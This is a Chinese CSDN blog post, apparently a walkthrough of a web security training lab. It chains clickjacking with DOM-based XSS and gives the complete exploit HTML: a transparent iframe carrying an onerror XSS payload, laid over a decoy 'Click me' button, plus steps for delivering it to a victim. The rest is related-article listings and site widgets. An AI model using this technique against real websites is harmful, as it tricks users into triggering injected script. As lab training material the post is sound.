Exploiting clickjacking vulnerability to trigger DOM-based XSS:利用点击劫持漏洞触发基于DOM的XSS...

最新推荐文章于 2024-10-06 18:55:55 发布
最新推荐文章于 2024-10-06 18:55:55 发布
阅读量116 收藏
点赞数
文章标签: 安全 python js css java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793774
版权

实验内容

该实验室包含一个由点击触发的XSS漏洞。构建一个点击劫持攻击,欺骗用户点击“点击我”按钮来调用该print()函数。

解决方法:

<style>
   iframe {
       position:relative;
       width:500;
       height: 700;
       opacity: 0.0001;
       z-index: 2;
   }
   div {
       position:absolute;
       top:610;
       left:80;
       z-index: 1;
   }
</style>
<div>Click me</div>
<iframe
src="https://xxxxxxxxxxxxxxxxxxxxxxx.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>
  • 转到漏洞利用服务器并将 HTML 模板粘贴到“body”部分:
  • 单击“存储”,然后单击“查看漏洞利用”。
  • 将鼠标悬停在“Test me”上并确保光标变为手形,表明 div 元素已正确定位。如果没有,则通过修改样式表的 top 和 left 属性来调整 div 元素的位置。
  • 单击“测试我”。打印对话框应该打开。
  • 将“Test me”更改为“Click me”,然后在漏洞利用服务器上单击“Store”。
  • 现在点击“向受害者提供漏洞利用”,实验室应该就解决了
  • 这里主要是一个基于Dom的XSS漏洞image
  • 可以看见一个Submitfeedback的字段,这里面就存在着DOM的xss漏洞,通过print的点击劫持,将email修改为黑客的email上
Zeker62
关注
Click Jacking点击劫持漏洞验证
afei001
02-09 1267
目录 1.前言 2.漏洞原理 3.漏洞验证 4.漏洞利用 5.漏洞修复 6.ClickJacking漏洞测试脚本(Python) 1.前言 前几天在对网站进行安全性测试时,发现存在ClickJacking点击劫持漏洞。AWVS扫出来报的是地危。利用的成本也不是很高,了解该漏洞的原理之后,我认为是个中危漏洞。 afei 服务器没有返回X-Frame-Options报头,这意味着该网站可能面临点击劫持攻击的风险。X-Frame-Options HTTP响...
2.SDL规范文档
weixin_30872337的博客
02-27 2312
01.安全设计Checklist 输入验证 校验跨信任边界传递的不可信数据(策略检查数据合法性,含白名单机制等)格式化字符串时,依然要检验用户输入的合法性,避免可造成系统信息泄露或者拒绝服务 禁止向Java Runtime.exec()方法传递不可信、未净化的数据(当参数中包含空格,双引号,以-或者/符号开头表示一个参数开关时,可能会导致参数注入漏洞),建议如果可以禁止JVM...
burpsuit 靶场(DOM-based vulnerabilities)
wanan的博客
01-22 223
burpsuit 靶场(DOM-based vulnerabilities)
Preliminary of web security & vulnerability
qq_34597894的博客
07-22 206
初苗: 此文可作为闲暇初探WEB安全的流水,也可以作为本人在学习安全的过程中阶段性笔记。 当然此文的目的并不限于提高安全常识,相比来说或许提高安全意识更为重要,然而作为一名软件开发工程师,因为相关原因,我们常常会忽视开发过程中的vulnerability(漏洞)。恰恰这些漏洞(当然这里不限于code vulnerability,因为很多时候业务方面的改造也有助于软件各方面的优化)需要相关人员自...
Hijack攻击揭秘
realmeh的专栏
01-11 1931
概述 Clickjacking是最近新兴的针对WEB前端的攻击手段。它通常使用一个ifream覆盖掉当前页面,欺骗用户点击iframe中的恶意内容。 Likejacking通常是针对社交网站的一种攻击手法,攻击者会欺骗用户去点击一个伪造的图标或按钮。如今攻击者已经研究出了大量的方法,来把官方的按钮模仿的惟妙惟肖。 Clickjacking技术首先是由Jeremiah Gros
Clickjacking (UI redressing)点击劫持
Eason_LYC安全白帽子的成长博客
05-13 2038
点击劫持Clickjacking)全面梳理介绍,并有配套靶场练习。难得的学习材料。
Burpsuite官方实验室之点击劫持
tpaer的博客
11-17 2483
这是BurpSuit官方的实验室靶场,以下将记录个人点击劫持共5个Lab的通关过程。
wuyun知识库目录
Grey的博客
01-15 8269
1269.利用Office宏及Powershell的针对性攻击样本分析2016-06-24 1268.SQL注入关联分析2016-06-24 1267.Android安全开发之ZIP文件目录遍历2016-06-23 1266.search-guard 在 Elasticsearch 2.3 上的运用2016-06-23 1265.签名加密破除-burp插件在app接口fuzz中的运用201
掌握漏洞赏金技巧
weixin_26636643的博客
09-27 1585
Bug bounties are a great way to gain experience in cybersecurity and earn some extra bucks. I’m a huge proponent for participating in bug bounties as your way into the cybersecurity industry. 错误赏金是获得网...
VINCE: Exploiting Visible Light Sensing for Smartphone-based NFC Systems
02-09
We experimentally profile the impact of screen brightness levels and refresh rates of smartphones, and then use the results to guide the design of light intensity encoding scheme of VINCE. We adopt ...
tools-for-exploiting-webapps:用于检测和利用Web应用程序中选定漏洞类别的工具-工程师论文-AGH UST
05-04
用于检测和利用Web应用程序中选定漏洞类别的工具 工程师论文-AGH UST 参考 安装 docker build -t thesis --build-arg VIRUSTOTAL_KEY=$VIRUSTOTAL_KEY . docker run -p 127.0.0.1:5000:5000 -t thesis
藏经阁-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface.pdf
08-26
藏经阁-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface
Lab: Exploiting PHP deserialization with a pre-built gadget chain:利用预先构建的小工具链利用 PHP 反序列化(PHPGGC的使用)...
Zeker62的博客
08-23 872
靶场内容 该实验室具有使用签名 cookie 的基于序列化的会话机制。它还使用通用的 PHP 框架。尽管您没有源代码访问权限,但您仍然可以使用预构建的小工具链来利用此实验室的不安全反序列化。 为了解决实验室问题,识别目标框架,然后使用第三方工具生成包含远程代码执行有效负载的恶意序列化对象。然后,研究如何生成包含恶意对象的有效签名 cookie。最后,将此传递到网站以morale.txt从 Car...
安全服务面试总结
m0_74402888的博客
10-03 651
from dhtemq') select dirtree,num1,num2 from ##dhtemqxx.xx.xx.xx 执行。入侵的时候 asp 的。正向 Shell:攻击者连接被攻击者机器,可用于攻击者处于内网,被攻击者处于公网的情况。反向 Shell:被攻击者主动连接攻击者,可用于攻击者处于外网,被攻击者处于内网的情况。在 NBSI 中,只要把临时表名加前加##就可以了,但要注意 URL 转码,即。--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表。
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 998
信息安全工程师——机房安全分析与防护篇
网 络 安 全
数字人生
10-06 1654
定义:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护的状态。范畴硬件安全:包括网络设备、服务器、终端等物理设备的安全。软件安全:包括操作系统、应用软件、数据库等的安全。数据安全:包括数据的保密性、完整性、可用性等。
实景三维赋能矿山安全风险监测预警
最新发布
GIS数据转换器的博客
10-06 848
实景三维技术,是指通过遥感、无人机航拍、地面扫描等手段,获取地表及地下空间的三维数据,构建高精度的三维模型。这项技术能够真实、直观地反映地形地貌、建筑物、植被等地表特征,为矿山安全风险监测提供了强有力的数据支撑。矿山安全无小事,实景三维技术的应用,为我们提供了一种全新的视角和方法。让我们携手科技,共同守护矿山安全,为国家的能源安全和可持续发展贡献力量。
确保接口安全:六大方案有效解决幂等性问题
天天的博客
10-02 1060
幂等(idempotency)本身是一个数学概念,常见与抽象代数中,代表一个函数或操作的结果不受其输入或者执行次数的影响,例如,f(n) = 1^n,无论 n 为多少,f(n)的值永远为 1。在软件开发领域,幂等对请求执行结果的一个描述,这个描述就是无论执行多少次相同的请求,产生的效果和返回的结果和发出单个请求是一样的。有时我们在填写某些form表单时,保存按钮不小心快速点了两次,表中竟然产生了两条重复的数据,只是id不一样。我们在项目中为了解决接口超时问题,通常会引入了重试机制。
exploiting bert for end-to-end aspect-based sentiment analysis
09-16
Bert是一种在自然语言处理中被广泛...总之,“exploiting bert for end-to-end aspect-based sentiment analysis”意味着通过对Bert进行修改和扩展,将其应用于端到端的方面级情感分析任务中,以提升模型的性能和效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值